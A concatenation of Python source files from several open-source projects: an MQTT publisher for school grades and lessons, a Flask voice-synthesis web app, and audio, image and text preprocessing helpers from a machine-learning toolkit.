attributes[f'class_average'] = []
attributes[f'coefficient'] = []
attributes[f'max'] = []
attributes[f'min'] = []
attributes[f'comment'] = []
for myGrade in myStudent.gradeList:
# Store evaluation into sensor
attributes[f'date'].append(myGrade.date)
attributes[f'subject'].append(myGrade.subject)
attributes[f'student_grade'].append(myGrade.defaultOutOf)
attributes[f'class_average'].append(myGrade.average)
attributes[f'coefficient'].append(myGrade.coefficient)
attributes[f'max'].append(myGrade.max)
attributes[f'min'].append(myGrade.min)
attributes[f'comment'].append(myGrade.comment)
myEntity.addAttribute("date",attributes[f'date'])
myEntity.addAttribute("subject",attributes[f'subject'])
myEntity.addAttribute("student_grade",attributes[f'student_grade'])
myEntity.addAttribute("class_average",attributes[f'class_average'])
myEntity.addAttribute("coefficient",attributes[f'coefficient'])
myEntity.addAttribute("max",attributes[f'max'])
myEntity.addAttribute("min",attributes[f'min'])
myEntity.addAttribute("comment",attributes[f'comment'])
logging.info("Grade added to HA sensor !")
# create lessons sensor
logging.info("Creation of the Lesson entity")
myEntity = hass.Entity(myDevice,hass.SENSOR,'lesson','lesson',hass.NONE_TYPE,None,None)
myEntity.setValue(myStudent.studentFullname)
attributes = {}
if myStudent.lessonShortList:
logging.info("Collecting and Publishing values Lessons from shortlist (last x days)...")
logging.info("---------------------------------")
attributes[f'date'] = []
attributes[f'start'] = []
attributes[f'end'] = []
attributes[f'subject'] = []
attributes[f'canceled'] = []
attributes[f'status'] = []
attributes[f'room'] = []
for myLesson in myStudent.lessonShortList:
# Store evaluation into sensor
attributes[f'date'].append(myLesson.lessonDateTime.split(" ",1)[0])
attributes[f'start'].append(myLesson.lessonStart)
attributes[f'end'].append(myLesson.lessonEnd)
attributes[f'subject'].append(myLesson.lessonSubject)
attributes[f'canceled'].append(myLesson.lessonCanceled)
attributes[f'status'].append(myLesson.lessonStatus)
attributes[f'room'].append(myLesson.lessonRoom)
myEntity.addAttribute("date",attributes[f'date'])
myEntity.addAttribute("start",attributes[f'start'])
myEntity.addAttribute("end",attributes[f'end'])
myEntity.addAttribute("subject",attributes[f'subject'])
myEntity.addAttribute("canceled",attributes[f'canceled'])
myEntity.addAttribute("status",attributes[f'status'])
myEntity.addAttribute("room",attributes[f'room'])
logging.info("Lesson added to HA sensor !")
# Publish config, state (when value not none), attributes (when not none)
logging.info("Publishing period devices...")
logging.info("You can retrieve published values subscribing topic %s",myDevice.hass.prefix + "/+/" + myDevice.id + "/#")
for topic,payload in myDevice.getStatePayload().items():
myMqtt.publish(topic,payload)
logging.info("Devices published !")
except:
logging.error("Home Assistant discovery mode : unable to publish period value to mqtt broker")
logging.error(traceback.format_exc())
####################################################################################################################
# STEP 4 : Disconnect mqtt broker (throws errors....to fix in future)
####################################################################################################################
if myMqtt.isConnected:
logging.info("-----------------------------------------------------------")
logging.info("# Disconnexion from MQTT #")
logging.info("-----------------------------------------------------------")
try:
myMqtt.disconnect()
logging.info("Mqtt broker disconnected")
except:
logging.error("Unable to disconnect mqtt broker")
sys.exit(1)
# Release memory
del myMqtt
del myPronote
####################################################################################################################
# STEP 5 : Disconnect from database
####################################################################################################################
logging.info("-----------------------------------------------------------")
logging.info("# Disconnexion from SQLite database #")
logging.info("-----------------------------------------------------------")
if myDb.isConnected() :
myDb.close()
logging.info("SQLite database disconnected")
del myDb
####################################################################################################################
# STEP 6 : Display next run info and end of program
####################################################################################################################
logging.info("-----------------------------------------------------------")
logging.info("# Next run #")
logging.info("-----------------------------------------------------------")
if myParams.scheduleFrequency > 0:
logging.info("The pronote2mqtt runs are scheduled every => %s hours",myParams.scheduleFrequency)
else:
if myParams.scheduleTime is not None:
logging.info("The pronote2mqtt next run is scheduled at %s",myParams.scheduleTime)
else:
logging.info("No schedule or frequency defined.")
logging.info("-----------------------------------------------------------")
logging.info("# End of program #")
logging.info("-----------------------------------------------------------")
########################################################################################################################
#### Main
########################################################################################################################
if __name__ == "__main__":
# Load params
myParams = param.Params()
# Set logging
if myParams.debug:
myLevel = logging.DEBUG
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=myLevel)
else:
myLevel = logging.INFO
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=myLevel)
# Say welcome and be nice
logging.info("-----------------------------------------------------------")
logging.info("# Welcome to pronote2mqtt #")
logging.info("-----------------------------------------------------------")
logging.info("Program version : %s",P2M_VERSION)
logging.info("Database version : %s", P2M_DB_VERSION)
logging.info("Please note that the the tool is still under development, various functions may disappear or be modified.")
logging.debug("If you can read this line, you are in DEBUG mode.")
# Log params info
logging.info("-----------------------------------------------------------")
logging.info("# Program parameters #")
logging.info("-----------------------------------------------------------")
myParams.logParams()
# Check params
logging.info("Check parameters...")
if myParams.checkParams():
logging.info("Parameters are ok !")
else:
logging.error("Error on parameters. End of program.")
quit()
# Run
# if scheduleFrequency set
if myParams.scheduleFrequency is not None:
# Run once at launch
run(myParams)
schedule.every(myParams.scheduleFrequency).hours.do(run,myParams)
while True:
schedule.run_pending()
time.sleep(1)
else:
# if scheduleTime set
if myParams.scheduleTime is not None:
# Run once at launch
run(myParams)
schedule.every().day.at(myParams.scheduleTime).do(run,myParams)
while True:
schedule.run_pending()
time.sleep(1)
else:
# Run once
run(myParams)
logging.info("End of pronote2mqtt.")
``` |
{
"source": "jimschenchen/Mocking_Bird_Playground",
"score": 2
} |
#### File: Mocking_Bird_Playground/web/__init__.py
```python
from web.api import api_blueprint
from pathlib import Path
from gevent import pywsgi as wsgi
from flask import Flask, Response, request, render_template
from synthesizer.inference import Synthesizer
from encoder import inference as encoder
from vocoder.hifigan import inference as gan_vocoder
from vocoder.wavernn import inference as rnn_vocoder
import numpy as np
import re
from scipy.io.wavfile import write
import librosa
import io
import base64
from flask_cors import CORS
from flask_wtf import CSRFProtect
import webbrowser
def webApp():
# Init and load config
app = Flask(__name__, instance_relative_config=True)
app.config.from_object("web.config.default")
app.config['RESTPLUS_MASK_SWAGGER'] = False
app.register_blueprint(api_blueprint)
# CORS(app)  # allow cross-origin requests; comment this line out to block them
csrf = CSRFProtect(app)
csrf.init_app(app)
syn_models_dirt = "synthesizer/saved_models"
synthesizers = list(Path(syn_models_dirt).glob("**/*.pt"))
synthesizers_cache = {}
encoder.load_model(Path("encoder/saved_models/pretrained.pt"))
rnn_vocoder.load_model(Path("vocoder/saved_models/pretrained/pretrained.pt"))
gan_vocoder.load_model(Path("vocoder/saved_models/pretrained/g_hifigan.pt"))
def pcm2float(sig, dtype='float32'):
"""Convert PCM signal to floating point with a range from -1 to 1.
Use dtype='float32' for single precision.
Parameters
----------
sig : array_like
Input array, must have integral type.
dtype : data type, optional
Desired (floating point) data type.
Returns
-------
numpy.ndarray
Normalized floating point data.
See Also
--------
float2pcm, dtype
"""
sig = np.asarray(sig)
if sig.dtype.kind not in 'iu':
raise TypeError("'sig' must be an array of integers")
dtype = np.dtype(dtype)
if dtype.kind != 'f':
raise TypeError("'dtype' must be a floating point type")
i = np.iinfo(sig.dtype)
abs_max = 2 ** (i.bits - 1)
offset = i.min + abs_max
return (sig.astype(dtype) - offset) / abs_max
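# Quick sanity check (illustrative values only): int16 audio is scaled by
# 2**15, so pcm2float(np.array([0, 16384, -32768], dtype=np.int16)) returns
# approximately [0.0, 0.5, -1.0].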
# Cache for synthesizer
@csrf.exempt
@app.route("/api/synthesize", methods=["POST"])
def synthesize():
# TODO Implementation with json to support more platform
# Load synthesizer
if "synt_path" in request.form:
synt_path = request.form["synt_path"]
else:
synt_path = synthesizers[0]
print("NO synthsizer is specified, try default first one.")
if synthesizers_cache.get(synt_path) is None:
current_synt = Synthesizer(Path(synt_path))
synthesizers_cache[synt_path] = current_synt
else:
current_synt = synthesizers_cache[synt_path]
print("using synthesizer model: " + str(synt_path))
# Load input wav
if "upfile_b64" in request.form:
wav_base64 = request.form["upfile_b64"]
wav = base64.b64decode(bytes(wav_base64, 'utf-8'))
wav = pcm2float(np.frombuffer(wav, dtype=np.int16), dtype=np.float32)
sample_rate = Synthesizer.sample_rate
else:
wav, sample_rate = librosa.load(request.files['file'])
write("temp.wav", sample_rate, wav) #Make sure we get the correct wav
encoder_wav = encoder.preprocess_wav(wav, sample_rate)
embed, _, _ = encoder.embed_utterance(encoder_wav, return_partials=True)
# Load input text
texts = filter(None, request.form["text"].split("\n"))
punctuation = '!,。、,' # punctuate and split/clean text
processed_texts = []
for text in texts:
for processed_text in re.sub(r'[{}]+'.format(punctuation), '\n', text).split('\n'):
if processed_text:
processed_texts.append(processed_text.strip())
texts = processed_texts
# synthesize and vocode
embeds = [embed] * len(texts)
specs = current_synt.synthesize_spectrograms(texts, embeds)
spec = np.concatenate(specs, axis=1)
if "vocoder" in request.form and request.form["vocoder"] == "WaveRNN":
wav = rnn_vocoder.infer_waveform(spec)
else:
wav = gan_vocoder.infer_waveform(spec)
# Return cooked wav
out = io.BytesIO()
write(out, Synthesizer.sample_rate, wav.astype(np.float32))
return Response(out, mimetype="audio/wav")
@app.route('/', methods=['GET'])
def index():
return render_template("index.html")
host = app.config.get("HOST")
port = app.config.get("PORT")
web_address = 'http://{}:{}'.format(host, port)
print(f"Web server:" + web_address)
webbrowser.open(web_address)
server = wsgi.WSGIServer((host, port), app)
server.serve_forever()
return app
if __name__ == "__main__":
webApp()
``` |
{
"source": "jim-schwoebel/allie",
"score": 3
} |
#### File: helpers/helpers/balancedelete.py
```python
import os, random, shutil
## helper functions
def get_wav():
# get all .WAV or .MP3 files in folder and count the number of them
listdir=os.listdir()
count=0
for i in range(len(listdir)):
if listdir[i][-4:] in ['.wav', '.mp3']:
count = count+1
return count
def random_remove(remove_num):
# remove a number of files to balnace classes.
listdir=os.listdir()
wavfiles=list()
random.shuffle(listdir)
for i in range(len(listdir)):
if listdir[i][-4:] in ['.wav', '.mp3']:
wavfiles.append(listdir[i])
for i in range(remove_num):
os.remove(wavfiles[i])
print('removed %s .wav or .mp3 files'%(remove_num))
# now go to main script
listdir=os.listdir()
# find all folders
folders=list()
for i in range(len(listdir)):
if listdir[i].find('.') < 0:
folders.append(listdir[i])
curdir=os.getcwd()
counts=list()
for i in range(len(folders)):
os.chdir(curdir)
os.chdir(folders[i])
count=get_wav()
counts.append(count)
# now find minimum
min_=min(counts)
for i in range(len(folders)):
os.chdir(curdir)
os.chdir(folders[i])
count=get_wav()
if count > min_:
remove_num=count-min_
random_remove(remove_num)
```
#### File: helpers/helpers/extract_noise.py
```python
import shutil, os, random
from pydub import AudioSegment
try:
os.mkdir('noise')
except:
shutil.rmtree('noise')
os.mkdir('noise')
def extract_noise(filename, length):
song = AudioSegment.from_mp3(filename)
first = song[100:100+length]
first.export(filename[0:-4]+'_noise.mp3')
shutil.move(os.getcwd()+'/'+filename[0:-4]+'_noise.mp3', os.getcwd()+'/noise/'+filename[0:-4]+'_noise.mp3')
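# Illustrative call (hypothetical filename): extract_noise('clip.mp3', 300)
# exports the 100 ms - 400 ms slice of clip.mp3 (pydub slices are in
# milliseconds) as clip_noise.mp3 and moves it into the ./noise folder.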
listdir=os.listdir()
mp3files=list()
for i in range(len(listdir)):
if listdir[i][-4:]=='.mp3':
mp3files.append(listdir[i])
random.shuffle(mp3files)
for i in range(len(mp3files)):
extract_noise(mp3files[i],300)
if i == 100:
break
os.chdir('noise')
listdir=os.listdir()
for i in range(len(listdir)):
if listdir[i][-4:]=='.mp3':
os.system('play %s'%(listdir[i]))
remove=input('should remove? type y to remove')
if remove=='y':
os.remove(listdir[i])
```
#### File: augmentation/audio_augmentation/augment_pitch.py
```python
import os, random
def augment_pitch(filename):
basefile=filename[0:-4]
randint=random.randint(300,600)
os.system('sox %s %s pitch %s'%(filename, basefile+'_freq_1.wav', str(randint)))
randint=random.randint(300,600)
os.system('sox %s %s pitch -%s'%(filename, basefile+'_freq_2.wav', str(randint)))
return [filename, basefile+'_freq_1.wav',basefile+'_freq_2.wav']
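# Illustrative call (hypothetical filename; requires the sox CLI on the PATH):
# augment_pitch('sample.wav') shifts the pitch up and then down by a random
# 300-600 cents and returns ['sample.wav', 'sample_freq_1.wav', 'sample_freq_2.wav'].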
```
#### File: eda_nlp/experiments/b_2_train_eval.py
```python
from b_config import *
from methods import *
from numpy.random import seed
seed(0)
###############################
#### run model and get acc ####
###############################
def run_model(train_file, test_file, num_classes, percent_dataset):
#initialize model
model = build_model(input_size, word2vec_len, num_classes)
#load data
train_x, train_y = get_x_y(train_file, num_classes, word2vec_len, input_size, word2vec, percent_dataset)
test_x, test_y = get_x_y(test_file, num_classes, word2vec_len, input_size, word2vec, 1)
#implement early stopping
callbacks = [EarlyStopping(monitor='val_loss', patience=3)]
#train model
model.fit( train_x,
train_y,
epochs=100000,
callbacks=callbacks,
validation_split=0.1,
batch_size=1024,
shuffle=True,
verbose=0)
#model.save('checkpoints/lol')
#model = load_model('checkpoints/lol')
#evaluate model
y_pred = model.predict(test_x)
test_y_cat = one_hot_to_categorical(test_y)
y_pred_cat = one_hot_to_categorical(y_pred)
acc = accuracy_score(test_y_cat, y_pred_cat)
#clean memory???
train_x, train_y = None, None
gc.collect()
#return the accuracy
#print("data with shape:", train_x.shape, train_y.shape, 'train=', train_file, 'test=', test_file, 'with fraction', percent_dataset, 'had acc', acc)
return acc
if __name__ == "__main__":
#get the accuracy at each increment
orig_accs = {dataset:{} for dataset in datasets}
aug_accs = {dataset:{} for dataset in datasets}
writer = open('outputs_f2/' + get_now_str() + '.csv', 'w')
#for each dataset
for i, dataset_folder in enumerate(dataset_folders):
dataset = datasets[i]
num_classes = num_classes_list[i]
input_size = input_size_list[i]
train_orig = dataset_folder + '/train_orig.txt'
train_aug_st = dataset_folder + '/train_aug_st.txt'
test_path = dataset_folder + '/test.txt'
word2vec_pickle = dataset_folder + '/word2vec.p'
word2vec = load_pickle(word2vec_pickle)
for increment in increments:
#calculate augmented accuracy
aug_acc = run_model(train_aug_st, test_path, num_classes, increment)
aug_accs[dataset][increment] = aug_acc
#calculate original accuracy
orig_acc = run_model(train_orig, test_path, num_classes, increment)
orig_accs[dataset][increment] = orig_acc
print(dataset, increment, orig_acc, aug_acc)
writer.write(dataset + ',' + str(increment) + ',' + str(orig_acc) + ',' + str(aug_acc) + '\n')
gc.collect()
print(orig_accs, aug_accs)
```
#### File: eda_nlp/preprocess/cr_clean.py
```python
from utils import *
def retrieve_reviews(line):
reviews = set()
chars = list(line)
for i, char in enumerate(chars):
if char == '[':
if chars[i+1] == '-':
reviews.add(0)
elif chars[i+1] == '+':
reviews.add(1)
reviews = list(reviews)
if len(reviews) == 2:
return -2
elif len(reviews) == 1:
return reviews[0]
else:
return -1
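# Illustrative behaviour (example lines are hypothetical): a line tagged only
# with "[+n]" markers returns 1, only "[-n]" markers returns 0, a line with
# both returns -2 (mixed review, skipped by clean_files), and a line with
# neither returns -1.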
def clean_files(input_files, output_file):
writer = open(output_file, 'w')
for input_file in input_files:
print(input_file)
input_lines = open(input_file, 'r').readlines()
counter = 0
bad_counter = 0
for line in input_lines:
review = retrieve_reviews(line)
if review in {0, 1}:
good_line = get_only_chars(re.sub("([\(\[]).*?([\)\]])", "\g<1>\g<2>", line))
output_line = str(review) + '\t' + good_line
writer.write(output_line + '\n')
counter += 1
elif review == -2:
bad_counter +=1
print(input_file, counter, bad_counter)
writer.close()
if __name__ == '__main__':
input_files = ['all.txt']#['canon_power.txt', 'canon_s1.txt', 'diaper.txt', 'hitachi.txt', 'ipod.txt', 'micromp3.txt', 'nokia6600.txt', 'norton.txt', 'router.txt']
input_files = ['raw/cr/data_new/' + f for f in input_files]
output_file = 'datasets/cr/apex_clean.txt'
clean_files(input_files, output_file)
```
#### File: eda_nlp/preprocess/utils.py
```python
import re
#cleaning up text
def get_only_chars(line):
clean_line = ""
line = line.lower()
line = line.replace(" 's", " is")
line = line.replace("-", " ") #replace hyphens with spaces
line = line.replace("\t", " ")
line = line.replace("\n", " ")
line = line.replace("'", "")
for char in line:
if char in 'qwertyuiopasdfghjklzxcvbnm ':
clean_line += char
else:
clean_line += ' '
clean_line = re.sub(' +',' ',clean_line) #delete extra spaces
print(clean_line)
if clean_line and clean_line[0] == ' ':
clean_line = clean_line[1:]
return clean_line
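# Illustrative call: get_only_chars("It's state-of-the-art!") comes back
# roughly as 'its state of the art' - lower-cased, with hyphens/punctuation
# replaced by spaces and repeated spaces collapsed.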
```
#### File: cleaning/audio_cleaning/clean_keyword.py
```python
import sys, os, shutil, librosa, uuid
from pyvad import vad, trim, split
import matplotlib.pyplot as plt
import numpy as np
# make sure the right version of numba is installed
os.system('pip3 install numba==0.48')
def transcribe_audiofile(file):
curdir=os.getcwd()
listdir=os.listdir()
deepspeech_dir=os.getcwd()
# download models if not in helper directory
if 'deepspeech-0.7.0-models.pbmm' not in listdir:
os.system('wget https://github.com/mozilla/DeepSpeech/releases/download/v0.7.0/deepspeech-0.7.0-models.pbmm')
if 'deepspeech-0.7.0-models.scorer' not in listdir:
os.system('wget https://github.com/mozilla/DeepSpeech/releases/download/v0.7.0/deepspeech-0.7.0-models.scorer')
# initialize filenames
textfile=file[0:-4]+'.txt'
newaudio=file[0:-4]+'_newaudio.wav'
if deepspeech_dir.endswith('/'):
deepspeech_dir=deepspeech_dir[0:-1]
# go back to main directory
os.chdir(curdir)
# try:
# convert audio file to 16000 Hz mono audio
os.system('ffmpeg -i "%s" -acodec pcm_s16le -ac 1 -ar 16000 "%s" -y'%(file, newaudio))
command='deepspeech --model %s/deepspeech-0.7.0-models.pbmm --scorer %s/deepspeech-0.7.0-models.scorer --audio "%s" >> "%s"'%(deepspeech_dir, deepspeech_dir, newaudio, textfile)
print(command)
os.system(command)
# get transcript
transcript=open(textfile).read().replace('\n','')
# remove temporary files
os.remove(textfile)
os.remove(newaudio)
# except:
# try:
# # remove temporary files
# os.remove(textfile)
# except:
# pass
# try:
# os.remove(newaudio)
# except:
# pass
# transcript=''
return transcript
def clean_keyword(audiofile,keyword):
'''
taken from https://github.com/F-Tag/python-vad/blob/master/example.ipynb
'''
show=False
curdir=os.getcwd()
data, fs = librosa.core.load(audiofile)
time = np.linspace(0, len(data)/fs, len(data))
try:
vact = vad(data, fs, fs_vad = 16000, hop_length = 30, vad_mode=3)
vact = list(vact)
while len(time) > len(vact):
vact.append(0.0)
utterances=list()
for i in range(len(vact)):
try:
if vact[i] != vact[i-1]:
# voice shift
if vact[i] == 1:
start = i
else:
# this means it is end
end = i
utterances.append([start,end])
except:
pass
print(utterances)
vact=np.array(vact)
tempfiles=list()
keptfiles=list()
for i in range(len(utterances)):
trimmed = data[utterances[i][0]:utterances[i][1]]
tempfile = str(uuid.uuid4())+'.wav'
librosa.output.write_wav(tempfile, trimmed, fs)
tempfiles.append(tempfile)
for i in range(len(tempfiles)):
if os.path.getsize(tempfiles[i]) > 20000:
transcript=transcribe_audiofile(tempfiles[i])
print('TRANSCRIPT --> %s'%(transcript))
if transcript == keyword:
keptfiles.append(tempfiles[i])
else:
os.remove(tempfiles[i])
else:
os.remove(tempfiles[i])
except:
print('ERROR - ValueError: When data.type is float, data must be -1.0 <= data <= 1.0.')
os.remove(audiofile)
return keptfiles
```
#### File: cleaning/audio_cleaning/clean_randomsplice.py
```python
import soundfile as sf
import os, ffmpy, random, getpass
def clean_randomsplice(audiofile, desiredlength):
try:
data, samplerate = sf.read(audiofile)
totalframes=len(data)
totalseconds=int(totalframes/samplerate)
startsec=random.randint(0,totalseconds-(desiredlength+1))
endsec=startsec+desiredlength
startframe=samplerate*startsec
endframe=samplerate*endsec
#write file to resave wave file at those frames
newfile='snipped_'+audiofile
sf.write(newfile, data[int(startframe):int(endframe)], samplerate)
os.remove(audiofile)
return [newfile]
except:
print('error, skipping...')
return [audiofile]
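# Illustrative call (hypothetical filename): clean_randomsplice('take.wav', 10)
# writes a random 10-second slice to snipped_take.wav, deletes the original
# and returns ['snipped_take.wav']; on failure the input file is returned unchanged.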
```
#### File: cleaning/image_cleaning/clean_extractfaces.py
```python
import cv2, os, time, shutil, math
import skvideo.io, skvideo.motion, skvideo.measure
from moviepy.editor import VideoFileClip
from PIL import Image
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from PIL import Image
def euclidean_distance(a, b):
x1 = a[0]; y1 = a[1]
x2 = b[0]; y2 = b[1]
return math.sqrt(((x2 - x1) * (x2 - x1)) + ((y2 - y1) * (y2 - y1)))
def detectFace(img,face_detector,eye_detector,nose_detector):
faces = face_detector.detectMultiScale(img, 1.3, 5)
#print("found faces: ", len(faces))
if len(faces) > 0:
face = faces[0]
face_x, face_y, face_w, face_h = face
img = img[int(face_y):int(face_y+face_h), int(face_x):int(face_x+face_w)]
img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
return img, img_gray
else:
img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
return img, img_gray
#raise ValueError("No face found in the passed image ")
def alignFace(img_path, face_detector, eye_detector, nose_detector):
img = cv2.imread(img_path)
plt.imshow(img[:, :, ::-1])
plt.show()
img_raw = img.copy()
img, gray_img = detectFace(img,face_detector,eye_detector,nose_detector)
eyes = eye_detector.detectMultiScale(gray_img)
#print("found eyes: ",len(eyes))
if len(eyes) >= 2:
#find the largest 2 eye
base_eyes = eyes[:, 2]
#print(base_eyes)
items = []
for i in range(0, len(base_eyes)):
item = (base_eyes[i], i)
items.append(item)
df = pd.DataFrame(items, columns = ["length", "idx"]).sort_values(by=['length'], ascending=False)
eyes = eyes[df.idx.values[0:2]]
#--------------------
#decide left and right eye
eye_1 = eyes[0]; eye_2 = eyes[1]
if eye_1[0] < eye_2[0]:
left_eye = eye_1
right_eye = eye_2
else:
left_eye = eye_2
right_eye = eye_1
#--------------------
#center of eyes
left_eye_center = (int(left_eye[0] + (left_eye[2] / 2)), int(left_eye[1] + (left_eye[3] / 2)))
left_eye_x = left_eye_center[0]; left_eye_y = left_eye_center[1]
right_eye_center = (int(right_eye[0] + (right_eye[2]/2)), int(right_eye[1] + (right_eye[3]/2)))
right_eye_x = right_eye_center[0]; right_eye_y = right_eye_center[1]
#center_of_eyes = (int((left_eye_x+right_eye_x)/2), int((left_eye_y+right_eye_y)/2))
cv2.circle(img, left_eye_center, 2, (255, 0, 0) , 2)
cv2.circle(img, right_eye_center, 2, (255, 0, 0) , 2)
#cv2.circle(img, center_of_eyes, 2, (255, 0, 0) , 2)
#----------------------
#find rotation direction
if left_eye_y > right_eye_y:
point_3rd = (right_eye_x, left_eye_y)
direction = -1 #rotate same direction to clock
print("rotate to clock direction")
else:
point_3rd = (left_eye_x, right_eye_y)
direction = 1 #rotate inverse direction of clock
print("rotate to inverse clock direction")
#----------------------
cv2.circle(img, point_3rd, 2, (255, 0, 0) , 2)
cv2.line(img,right_eye_center, left_eye_center,(67,67,67),1)
cv2.line(img,left_eye_center, point_3rd,(67,67,67),1)
cv2.line(img,right_eye_center, point_3rd,(67,67,67),1)
a = euclidean_distance(left_eye_center, point_3rd)
b = euclidean_distance(right_eye_center, point_3rd)
c = euclidean_distance(right_eye_center, left_eye_center)
#print("left eye: ", left_eye_center)
#print("right eye: ", right_eye_center)
#print("additional point: ", point_3rd)
#print("triangle lengths: ",a, b, c)
cos_a = (b*b + c*c - a*a)/(2*b*c)
#print("cos(a) = ", cos_a)
angle = np.arccos(cos_a)
#print("angle: ", angle," in radian")
angle = (angle * 180) / math.pi
print("angle: ", angle," in degree")
if direction == -1:
angle = 90 - angle
print("angle: ", angle," in degree")
#--------------------
#rotate image
new_img = Image.fromarray(img_raw)
new_img = np.array(new_img.rotate(direction * angle))
else:
# fewer than two eyes detected, keep the original (unrotated) image
new_img = img_raw
return new_img
def capture_video(filename, timesplit):
video=cv2.VideoCapture(0)
fourcc = cv2.VideoWriter_fourcc(*'XVID')
frame_width = int(video.get(3))
frame_height = int(video.get(4))
out = cv2.VideoWriter(filename,cv2.VideoWriter_fourcc('M','J','P','G'), 10, (frame_width,frame_height))
a=0
start=time.time()
while True:
a=a+1
check, frame=video.read()
#print(check)
#print(frame)
gray=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
out.write(frame)
#cv2.imshow("frame",gray)
end=time.time()
if end-start>timesplit:
break
#print(end-start)
print(a)
video.release()
out.release()
cv2.destroyAllWindows()
return filename
def clean_extractfaces(filename,basedir):
# paths
opencv_home = cv2.__file__
folders = opencv_home.split(os.path.sep)[0:-1]
path = folders[0]
for folder in folders[1:]:
path = path + "/" + folder
# other stuff
face_detector_path = path+"/data/haarcascade_frontalface_default.xml"
eye_detector_path = path+"/data/haarcascade_eye.xml"
nose_detector_path = path+"/data/haarcascade_mcs_nose.xml"
if os.path.isfile(face_detector_path) != True:
raise ValueError("Confirm that opencv is installed on your environment! Expected path ",detector_path," violated.")
face_detector = cv2.CascadeClassifier(face_detector_path)
eye_detector = cv2.CascadeClassifier(eye_detector_path)
nose_detector = cv2.CascadeClassifier(nose_detector_path)
# load image file
image_file = filename
alignedFace = alignFace(image_file, face_detector, eye_detector, nose_detector)
gray = cv2.cvtColor(alignedFace, cv2.COLOR_BGR2GRAY)
faces = face_detector.detectMultiScale(gray, 1.3, 5)
increment=0
facenums=0
print(len(faces))
filenames=list()
if len(faces) == 0:
pass
else:
for (x,y,w,h) in faces:
img=alignedFace
cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)
newimg=img[y:y+h,x:x+w]
new_image_file=image_file[0:-4] + '_face_' + str(increment) + '.png'
newimg=cv2.resize(newimg, (100, 100), interpolation=cv2.INTER_LINEAR)
norm_img = np.zeros((100, 100))
norm_img = cv2.normalize(newimg, norm_img, 0, 255, cv2.NORM_MINMAX)
cv2.imwrite(new_image_file, newimg)
filenames.append(new_image_file)
facenums=facenums+1
os.remove(filename)
return filenames
```
#### File: allie/datasets/seed_test.py
```python
import os, shutil
def prev_dir(directory):
g=directory.split('/')
dir_=''
for i in range(len(g)):
if i != len(g)-1:
if i==0:
dir_=dir_+g[i]
else:
dir_=dir_+'/'+g[i]
# print(dir_)
return dir_
listdir=os.listdir()
if 'sample_voice_data' not in listdir:
os.system('git clone <EMAIL>:jim-schwoebel/sample_voice_data.git')
else:
pass
cur_dir=os.getcwd()
base_dir=prev_dir(cur_dir)
train_dir=base_dir+'/train_dir'
try:
shutil.copy(cur_dir+'/sample_voice_data/gender_all.csv',train_dir+'/gender_all.csv')
except:
os.remove(train_dir+'/gender_all.csv')
shutil.copy(cur_dir+'/sample_voice_data/gender_all.csv',train_dir+'/gender_all.csv')
try:
shutil.copytree(cur_dir+'/sample_voice_data/males',train_dir+'/males')
except:
shutil.rmtree(train_dir+'/males')
shutil.copytree(cur_dir+'/sample_voice_data/males',train_dir+'/males')
try:
shutil.copytree(cur_dir+'/sample_voice_data/females',train_dir+'/females')
except:
shutil.rmtree(train_dir+'/females')
shutil.copytree(cur_dir+'/sample_voice_data/females',train_dir+'/females')
```
#### File: helpers/DigiPsych_Prosody/featurize.py
```python
import argparse, json, os, sys
from prosody import Voice_Prosody
import pandas as pd
from datetime import datetime
'''
Featurize wrapper for extracting prosody features from a single audio file
'''
def featurize_audio(audiofile,fsize):
df = pd.DataFrame()
vp = Voice_Prosody()
if audiofile.endswith('.wav'):
print('Featurizing:',audiofile)
feat_dict = vp.featurize_audio(audiofile,int(fsize))
features=list(feat_dict.values())[0:-1]
labels=list(feat_dict)[0:-1]
print(features)
print(labels)
return features, labels
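# Illustrative call (hypothetical file; fsize is the frame size forwarded to
# Voice_Prosody.featurize_audio): features, labels = featurize_audio('session.wav', 256)
# returns the prosody feature values together with their matching label names.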
```
#### File: helpers/pyAudioLex/noun_freq.py
```python
from nltk.tokenize import word_tokenize
from nltk.tag import pos_tag, map_tag
def noun_freq(s, tokens = None):
if tokens == None:
tokens = word_tokenize(s)
pos = pos_tag(tokens)
nouns = []
for [token, tag] in pos:
part = map_tag('en-ptb', 'universal', tag)
if part == "NOUN":
nouns.append(token)
if len(tokens) == 0:
return float(0)
else:
return float(len(nouns)) / float(len(tokens))
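# Illustrative call (requires the NLTK tokenizer and tagger models):
# noun_freq('the dog runs fast') should return about 0.25, i.e. one NOUN
# ('dog') out of four tokens.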
```
#### File: text_features/parts of speech/rbs_freq.py
```python
import nltk
from nltk.tokenize import word_tokenize
from nltk.tag import pos_tag, map_tag
from collections import Counter
# frequency of the RP (particle) part-of-speech tag per token
def rp_freq(importtext):
text=word_tokenize(importtext)
tokens=nltk.pos_tag(text)
c=Counter(token for word, token in tokens)
return c['RP']/len(text)
```
#### File: text_features/parts of speech/to_freq.py
```python
import nltk
from nltk.tokenize import word_tokenize
from nltk.tag import pos_tag, map_tag
from collections import Counter
# frequency of the TO part-of-speech tag per token
def to_freq(importtext):
text=word_tokenize(importtext)
tokens=nltk.pos_tag(text)
c=Counter(token for word, token in tokens)
return c['TO']/len(text)
```
#### File: text_features/parts of speech/vbn_freq.py
```python
import nltk
from nltk.tokenize import word_tokenize
from nltk.tag import pos_tag, map_tag
from collections import Counter
# frequency of the VBN (past participle verb) part-of-speech tag per token
def vbn_freq(importtext):
text=word_tokenize(importtext)
tokens=nltk.pos_tag(text)
c=Counter(token for word, token in tokens)
return c['VBN']/len(text)
```
#### File: text_features/words/polarity.py
```python
import nltk
from nltk import word_tokenize
from textblob import TextBlob
import numpy as np
def polarity(importtext):
text=word_tokenize(importtext)
tokens=nltk.pos_tag(text)
#sentiment polarity of the session
polarity=TextBlob(importtext).sentiment[0]
#sentiment subjectivity of the session
sentiment=TextBlob(importtext).sentiment[1]
#average difference polarity every 3 words
polaritylist=list()
for i in range(0,len(tokens),3):
if i <= len(tokens)-3:
words=text[i]+' '+text[i+1]+' '+text[i+2]
polaritylist.append(TextBlob(words).sentiment[0])
else:
pass
avgpolarity=np.mean(polaritylist)
#std polarity every 3 words
stdpolarity=np.std(polaritylist)
#variance polarity every 3 words
varpolarity=np.var(polaritylist)
